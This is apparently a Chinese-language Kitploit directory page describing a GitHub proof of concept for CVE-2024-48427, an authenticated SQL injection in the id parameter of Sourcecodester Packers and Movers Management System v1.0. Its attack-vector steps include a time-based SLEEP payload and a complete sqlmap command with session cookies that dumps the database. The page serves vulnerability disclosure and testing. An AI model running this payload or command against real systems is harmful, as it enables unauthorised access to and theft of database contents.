Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-48427 — 针对CVE-2024-48427的概念验证:Sourcecodester Packers and Movers Management System v1.0中的SQL注入。利用id参数执行任意SQL命令并转储数据库内容。 | Kitploit
工具/GitHubGitHub/vighneshnair7/cve-2024-48427
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

针对CVE-2024-48427的概念验证:Sourcecodester Packers and Movers Management System v1.0中的SQL注入。利用id参数执行任意SQL命令并转储数据库内容。

查看仓库
1121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48427

描述

Sourcecodester Packers and Movers Management System v1.0 中存在一个 SQL 注入漏洞,允许远程认证用户通过 /mpms/admin/?page=services/manage_service&id 中的 id 参数执行任意 SQL 命令。

漏洞类型

SQL 注入

产品供应商

Sourcecodester

受影响产品代码库:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

受影响组件:

位于 /mpms/admin/?page=services/manage_service&id 的更新服务详情页面中的 id 参数

攻击向量:

  1. 在本地设置应用程序并使用给定的默认凭据登录管理员面板。
  2. 导航到漏洞页面:http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. 向 id 参数注入 SQL 载荷:http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. 观察应用程序响应:若注入成功,页面加载时间应明显延长(5 秒),确认 id 参数存在 SQL 注入漏洞。
  5. 现在运行 SQLMap 工具以转储数据库详情:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

参考:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
下载工具